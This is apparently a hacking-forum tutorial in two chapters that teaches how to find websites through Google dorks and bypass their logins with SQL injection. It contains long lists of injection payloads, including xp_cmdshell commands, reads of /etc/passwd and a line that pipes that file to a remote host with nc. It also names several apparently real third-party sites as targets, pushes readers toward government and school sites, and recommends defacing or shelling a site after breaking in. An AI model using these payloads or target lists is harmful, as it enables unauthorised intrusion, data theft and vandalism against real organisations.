Web Application Hacking Methods

Bypassing Login pages on websites using SQL injectable queries

Level: Beginners and Intermediate

Requirements: Patience and stradegy
Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.
This is Chapter 2 of the MegaProject.
Please visit Chapter 1 if you haven't seen it yet.
Also, if you need some questions answered, you can find solutions on my FAQ Thread:

What is SQL injection?

Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:

Code:

Username: admin
Password: ‘ or ‘1’=’1

When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query

PHP Code:

SELECT * FROM users
WHERE username = ‘admin’AND password = ‘ ‘ or ‘1’=’1’ 

In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we

Step1: Finding websites with Login Page

Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial:
In this tutorial, we can use these dorks:

Code:

inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html

If you want to find more dorks when using this method, you can find them here:

Code:

http://pastebin.com/ZjxpivV3

Step2: Now Executing the query

Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their database

Code:

Username: admin
Password: ' or 0=0 --

Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.

Code:

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.

Step3: I LOGGED in, what to do now?!

Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon

Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website

Extras:

Common Password Queries:

Code:

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed

Code:

1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'

Database Version lower than 5 i.e Version 4 cannot accept UNION version 5 type queries.
Looking for a test or challenge?
Try Stewie's hack test: http://www.stewie390.info/hack_tests/lvl5/homepage.php
Here are some sites you can test on:

Code:

http://www.amskrupajal.org/AdminLogin.asp
http://www.csimatrichss.org/adminpage.asp
http://www.preventivecardiology.in/adminlogin.asp
http://pndllc.com/pndllc/admin/adminlogin.asp
http://www.singleusemedical.com/admin/adminLogin.asp
http://www.ringjordan.com/admin.asp
http://sunmarytrust.org/adminlogin.asp

I tried injecting all of them and it worked, so it should work for you too

Good luck

End of Chapter 2
Upcoming Chapter 3:
Union Based/Normal SQL injection
Stay tuned for the upcoming tutorials

Spid3r

For Beginners

A method of finding websites vulnerable to SQL injection is using what we call "dorks"
Dorks:They are like search criteria in which a search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning on how to use dorks

For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.

Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-

Code:

http://pastebin.com/0FqmasC7

Dork List by Sidesipe-

Code:

http://pastebin.com/x1rtqktj

Dork List by .Newsletter'

Code:

http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="

Step2: Making use of your Dorks with the help of Google

Here's what you do:
Go to http://www.google.com
Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
In your mouse, there should be a scroll button right?
Hover your mouse on each link and hit the scroll button so that it'll open on a new tab. (Lets say you can open about 10 links at a time)

Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.
So our site will look like this

[code]
http://www.site.com/index.php?id=123'[/code]

Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.

To determine if a website is vulnerable or not, it should return an error!

Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection

Here's a video demonstration on how to use Dorks:

Extra Notes: Hunting for specific websites with specific domains

Ever want to hack a government website, or an organization website?
It's simple. All you have to do is improvise your dorks.
First off, here are some common domains
[code].gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites ( similar to .com)[/code]

Alright now you know some specific domains, lets add them to our dork shall we?

Follow this formula-like dork

[code]

"inurl:."domain"/"dorks" "

So you would normally understand it like this:
"inurl" = input URL
"domain" = your desired domain ex. .gov
"dorks" = your dork of your choice
Now for an example, lets say you want to hack government websites
Here's how it'll look
"inurl:.gov/index.php?id="[/code]
Once you search that up, you'll find a lot of government websites on your results

Changing "inurl" and using another one
Yes, you can change that too.
Google has a lot of functions you can come up with
Some of them are below where you can change "inurl" and make another dork
[code]
intitle:
intext:
define:
site:
info:
link:
[/code] Credits to Real Steel for bringing this up
Choose any of the and make another.
Example: "intext:.edu/gallery?id="
More information about those here: http://www.hackforums.net/showthread.php?tid=2033496

Some Dork Scanners you can use to help you speed up the process

Scanner by moveax
http://www.hackforums.net/showthread.php?tid=1985016

Scanner by p0iz0ner
http://www.hackforums.net/showthread.php...SQL+poizon

Scanner by kript0x
http://www.hackforums.net/showthread.php...rk+scanner

If you're lazy in using dorks to find vulnerable websites, then you can use some list right here:

Vulnerable List by Dyme:
http://pastebin.com/kVMYX0Eh

End of Chapter 1
Upcoming chapters:
Chapter2- Basic MySQL injection using "Login" Queries"
Please stayed tuned with my tutorials and hope you enjoyed this chapter